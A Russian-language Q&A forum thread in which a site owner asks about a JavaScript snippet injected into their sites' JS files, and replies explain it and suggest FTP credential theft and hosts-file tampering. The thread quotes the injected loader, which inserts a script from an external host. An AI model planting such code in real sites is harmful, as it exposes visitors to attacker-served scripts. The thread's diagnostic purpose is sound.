Внедрили странный кусок кода

Вот такой кусок кода был внедрен пару дней назад в моих два сайта, в основном в файлы js

/*b44d55*/ function srcc() { var ff = document.createElement('script'); ff.src = 'http://mail.ru'; if (!document.getElementById('ff')) { document.write('<div id=\'ff\'></div>'); document.getElementById('ff').appendChild(ff); } } srcc(); /*/b44d55*/

конечно я сменил пароли на ftp и mysql, может кто-то сталкивался?
Первый раз вижу такое чтобы на сайте в коде появились куски чужеродного кода
  • Вопрос задан
  • 5540 просмотров
Пригласить эксперта
Ответы на вопрос 5
Anonym
@Anonym
Программирую немного )
Что делает код:
  1. Создается скрипт с src=http://mail.ru
    var ff = document.createElement('script'); ff.src = 'http://mail.ru';
    

  2. Добавляется div
    document.write('<div id=\'ff\'></div>'); 
    

  3. В div добавляется скрипт
    document.getElementById('ff').appendChild(ff);
    


Так как нет никакого смысла добавлять скрипт с mail.ru, то предполагаю, что в hosts вам тоже добавили левые адреса, чтобы mail.ru отдавал нужный скрипт.
Ответ написан
eleventyseven
@eleventyseven
.Net разработчик
Год назад работал в компании по созданию сайтов, также занимались хостингом. Как-то утром обнаружили, что порядка 100 сайтов заражены. Именно данной чертовщиной. Проверяйте все js, php, html файлы. Залезли через ftp
Ответ написан
@lubezniy
Думаю, кто-то из начинающих взломщиков тестил, а потом банально урл поменять забыл.
А в самом факте внедрения кода в файлы, увы, ничего удивительного нет. Следите постоянно за контентом и скриптами.
Ответ написан
Комментировать
rakot
@rakot
Ага ты им счетчики накручиваешь, а они тебе сертификат мейлвари подписать.
Ответ написан
termin
@termin
Столкнулся на днях с такой штукой. Причем вычистив все куски которые были изменены на сайте, на движке OpenCart, ситуация повторилась, и теперь сайт перестал отображаться вообще. Что интересно, изменился файл hosts практически в то время, как я пришел на работу, а сегодня я немного опоздал. Там ничего интересного нет, но и время изменения файлов на сайте было зафиксировано так-же после включения компьютера. Пока смотрю в сторону FileZilla, т.к. подозрительно были известны аккаунты от фтп и Антивирус Касперсого указал на уязвимость www.securelist.com/ru/advisories/54415/?function=advisories&VN=54415.
Ответ написан
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы